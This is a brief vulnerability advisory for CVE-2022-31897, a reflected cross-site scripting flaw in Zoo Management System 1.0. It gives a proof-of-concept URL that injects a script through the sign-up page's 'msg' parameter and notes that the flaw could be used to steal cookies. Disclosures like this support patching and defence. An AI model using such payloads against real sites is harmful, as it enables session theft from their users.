Zoo Management System 1.0 Cross Site Scripting

Zoo Management System version 1.0 suffers from a cross site scripting vulnerability.

SHA-256 | c2c4aa85cb3df00f1fddb60ea24a09058f2a8faf14d274c3e8673a5ae5d6286f

# Exploit Title: Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)
# Date: 06/22/2022
# Exploit Author: Angelo Pio Amirante
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15344/zoo-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: Server: XAMPP on Windows 10
# CVE: CVE-2022-31897

# Description:
Zoo Management System 1.0 is vulnerable to reflected cross-site scripting on the sign-up page. The "msg" parameter in 'http://localhost/public_html/register_visitor?msg=' is vulnerable.

# Impact:
An attacker could steal cookies with a crafted URL sent to the victims.

# Exploit:

Visit the following page:

1) http://localhost/public_html/register_visitor?msg=<script>alert(window.navigator.userAgent)</script>

2) Alert pop up is fired!

# Image poc:

https://ibb.co/8XKDgJX -> Registration page
https://ibb.co/mTTmTmy -> XSS

Related Posts